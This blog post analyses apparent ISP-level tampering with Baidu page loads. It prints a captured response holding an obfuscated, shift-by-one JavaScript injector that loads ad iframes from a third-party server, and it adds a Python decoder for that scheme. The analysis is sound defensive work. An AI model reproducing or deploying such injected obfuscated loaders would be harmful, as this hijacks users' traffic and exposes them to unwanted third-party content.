• China Unicom DNS hijacking


    For the past couple of days, ads have been popping up now and then while I browse. After ruling out malware on the machine, I suspected DNS hijacking, so I opened Fiddler and kept browsing. On one load of http://www.baidu.com an ad popped up in the lower-right corner of the page, so I immediately switched to Fiddler and looked at the HTTP traffic:

    GET http://www.baidu.com/ HTTP/1.1
    Host: www.baidu.com
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: zh-CN,zh;q=0.8
    Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
    Cookie: baidututuid=oldbaidututuiduser; baidstuurl=oldbaidututuiduser; NLC=0; Hm_lvt_9f14aaa038bbba8b12ec2a4a3e51d254=1315812373419; USERID=ee88756e2f08c323dc1f; BAIDU_WISE_UID=wiaui_1317086444_8009; MCITY=-%3A; vjuids=41ae5cbea.132d20f63e1.0.9ba426ad; vjlast=1317784217,1317784217,30; BAIDUID=6ABFB40CB81C81A172B13D4DC439448E:FG=1
    
    HTTP/1.1 200 OK
    Content-Type: text/html
    Cache-Control: no-cache
    Expires: epoch
    charset=gb2312: 
    Content-Length: 1057
    Connection: close
    
    <script>var d="=iunm?=ifbe?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#?gvodujpo!mpbeBuusjcvuf)*|wbs!g>epdvnfou/hfuFmfnfouCzJe)#g#*<wbs!tfswfs>#iuuq;0072/293/283/7;33161#<wbs!sfrvjsfe>#beje>311169'uddb>d3q7ZXRxNUN3NUF2OFCi[IOt'vsjq>2117776366'psmv>bIS1dEpwM4e4ez6jZXmleT6kc31>'tqje>46394886:4'bsfb>3'ut>2429366336#<jg)tfmg/epdvnfou/mpdbujpo>>xjoepx/epdvnfou/VSM!''!epdvnfou/cpez/dmjfouXjeui?>611!''!epdvnfou/cpez/dmjfouIfjhiu?>611*|g/tsd>tfswfs,#0b0t@g>betuzmf`nto/iu";function i(_,__){_+=__;var $="";for(var u=0;u<_.length;u++){var r=_.charCodeAt(u);$+=String.fromCharCode(r-1);}return $;} var c="nm'#,sfrvjsfe,#'bpsmv>bIS1dEpwM4e4ez6tbY[mNENyNT6kc31wbX6kcIWl[Xi1cXxwcHm3[UB{NUGv[Ye{NkByNUFxNUBxNT6peH1>'q2bsn>299'q3bsn>363'q4bsn>31'q5bsn>6'q6bsn>4'q7bsn>2'bqqe>1'ibtDpvou>2'ibtXijufVtfs>2#<~fmtf|g/tsd>tfswfs,#0b0q@#,sfrvjsfe,#'qvtiGmbh>1#<~~=0tdsjqu?=0ifbe?=cpez!pompbe>#mpbeBuusjcvuf)*#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op?=jgsbnf!je>#g#!gsbnfCpsefs>1!xjeui>211&!ifjhiu>211&!tdspmmjoh>bvup!tsd>##?=0jgsbnf?=0cpez?=0iunm?";document.write(i(d,c));</script>
    

      Inspecting the page in the browser, the HTML DOM structure looked like this:

    As you can see, there are three nested iframes: first an obfuscated script generates page A, which then loads an ad-management page B, and page B in turn creates an iframe to load the real Baidu page, "http://www.baidu.com?t=1318255266413".
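    As an added example (not from the original post), here is a Python decoder for the shift-by-one scheme used by the injected script's i(d, c): it joins the two string halves, subtracts one from every character code, and then lists the iframe sources in the recovered markup so each nested frame can be reviewed. The obfuscated sample below is constructed the same way and is not the captured payload.

```python
import re


def deobfuscate(d: str, c: str) -> str:
    """Mirror the injected script's i(d, c): concatenate both halves and
    subtract 1 from every character code (e.g. '=iunm?' -> '<html>')."""
    return "".join(chr(ord(ch) - 1) for ch in d + c)


def obfuscate(html: str) -> str:
    """Inverse transform, used here only to build a constructed sample."""
    return "".join(chr(ord(ch) + 1) for ch in html)


def decode_injected_body(body: str):
    """Pull the d and c string literals out of a response body shaped like the
    captured one (var d="..."; ... var c="..."; document.write(i(d,c));) and
    return the decoded markup, or None if the body does not have that shape."""
    d = re.search(r'var d="([^"]*)"', body)
    c = re.search(r'var c="([^"]*)"', body)
    if not (d and c):
        return None
    return deobfuscate(d.group(1), c.group(1))


def iframe_sources(html: str) -> list:
    """List the iframe src attributes in decoded markup, so each nested frame
    (ad page vs. the site the user actually requested) can be reviewed."""
    return re.findall(r'<iframe[^>]*\bsrc="([^"]*)"', html, flags=re.IGNORECASE)


# Constructed sample (not the page's real payload): a wrapper page whose only
# content is an iframe that loads the site the user asked for.
SAMPLE_HTML = ('<html><body><iframe id="f" src="http://www.baidu.com/?t=1318255266413"'
               ' width="100%" height="100%"></iframe></body></html>')
SAMPLE_D = obfuscate(SAMPLE_HTML[:24])
SAMPLE_C = obfuscate(SAMPLE_HTML[24:])
SAMPLE_BODY = ('<script>var d="' + SAMPLE_D + '";'
               'function i(_,__){_+=__;var $="";for(var u=0;u<_.length;u++)'
               '{$+=String.fromCharCode(_.charCodeAt(u)-1);}return $;} '
               'var c="' + SAMPLE_C + '";document.write(i(d,c));</script>')

if __name__ == "__main__":
    decoded = decode_injected_body(SAMPLE_BODY)
    print(decoded)
    print(iframe_sources(decoded))
```

Running decode_injected_body over the real captured body recovers the wrapper markup the post describes, with the ad server and the nested iframe visible in clear text.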

    So at the network layer we can now see that the data coming back has been tampered with. Does that count as conclusive evidence of DNS hijacking on the China Unicom network?

  • Original post: https://www.cnblogs.com/evlon/p/2206644.html